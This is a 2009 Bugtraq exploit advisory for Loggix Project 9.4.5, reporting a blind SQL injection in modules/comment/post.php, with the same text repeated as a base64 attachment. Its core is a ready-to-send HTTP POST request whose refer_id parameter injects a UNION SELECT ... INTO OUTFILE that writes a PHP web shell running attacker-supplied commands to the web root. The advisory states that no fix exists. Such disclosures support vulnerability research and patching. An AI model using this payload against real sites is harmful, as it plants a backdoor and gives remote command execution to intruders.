Loggix Project 9.4.5 Blind SQL Injection
Date: Fri, 10 Apr 2009 16:37:29 +0200
Subject: Loggix Project 9.4.5 Blind SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: multipart/mixed; boundary=001636c5b6dae717cb0467344dd1
X-Virus-Scanned: antivirus-gw at tyumen.ru
--001636c5b6dae717cb0467344dd1
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******* Salvatore "drosophila" Fresta *******
[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org
[+] Bugs: [A] Blind SQL Injection
[+] Exploitation: Remote
[+] Date: 10 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Blind SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php
This bug allows a guest to execute arbitrary
queries.
*************************************************
[+] Code
- [A] Blind SQL Injection
POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
UNION ALL SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE
'/var/www/htdocs/rce.php
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
--001636c5b6dae717cb0467344dd1
Content-Type: text/plain; charset=US-ASCII;
name="Loggix Project 9.4.5 Blind SQL Injection-10042009.txt"
Content-Disposition: attachment;
filename="Loggix Project 9.4.5 Blind SQL Injection-10042009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_ftczf80m0
KioqKioqKiAgIFNhbHZhdG9yZSAiZHJvc29waGlsYSIgRnJlc3RhICAgKioqKioqKgoKWytdIEFw
cGxpY2F0aW9uOiBMb2dnaXggUHJvamVjdApbK10gVmVyc2lvbjogOS40LjUKWytdIFdlYnNpdGU6
IGh0dHA6Ly9sb2dnaXguZ290ZG5zLm9yZwoKWytdIEJ1Z3M6IFtBXSBCbGluZCBTUUwgSW5qZWN0
aW9uCgpbK10gRXhwbG9pdGF0aW9uOiBSZW1vdGUKWytdIERhdGU6IDEwIEFwciAyMDA5CgpbK10g
RGlzY292ZXJlZCBieTogU2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIEF1dGhvcjog
U2FsdmF0b3JlICJkcm9zb3BoaWxhIiBGcmVzdGEKWytdIENvbnRhY3Q6IGUtbWFpbDogZHJvc29w
aGlsYXh4eEBnbWFpbC5jb20KCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqCgpbK10gTWVudQoKMSkgQnVncwoyKSBDb2RlCjMpIEZpeAoKCioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKClsrXSBCdWdzCgoKLSBb
QV0gQmxpbmQgU1FMIEluamVjdGlvbgoKWy1dIFJpc2s6IG1lZGl1bQpbLV0gUmVxdWlzaXRlczog
bWFnaWNfcXVvdGVzX2dwYyA9IG9mZgpbLV0gRmlsZSBhZmZlY3RlZDogbW9kdWxlcy9jb21tZW50
L3Bvc3QucGhwCgpUaGlzIGJ1ZyBhbGxvd3MgYSBndWVzdCB0byBleGVjdXRlIGFyYml0cmFyeQpx
dWVyaWVzLgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioKClsrXSBDb2RlCgoKLSBbQV0gQmxpbmQgU1FMIEluamVjdGlvbgoKUE9TVCAvcGF0aC9tb2R1
bGVzL2NvbW1lbnQvcG9zdC5waHAgSFRUUC8xLjFcclxuCkhvc3Q6IHNpdGVcclxuCktlZXAtQWxp
dmU6IDMwMFxyXG4KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZVxyXG4KQ29udGVudC1UeXBlOiBhcHBs
aWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWRcclxuCkNvbnRlbnQtTGVuZ3RoOiAxNzdcclxu
ClxyXG4KdGl0bGU9dGl0bGUmY29tbWVudD1jb21tZW50JnVzZXJfbmFtZT11c2VyJnVzZXJfcGFz
cz1wYXNzd29yZCZwYXJlbnRfa2V5PWtleSZyZWZlcl9pZD0tMScgVU5JT04gQUxMIFNFTEVDVCAn
PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+JyBJTlRPIE9VVEZJTEUgJy92YXIvd3d3L2h0
ZG9jcy9yY2UucGhwCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKWytdIEZpeAoKTm8gZml4LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKio=
--001636c5b6dae717cb0467344dd1--
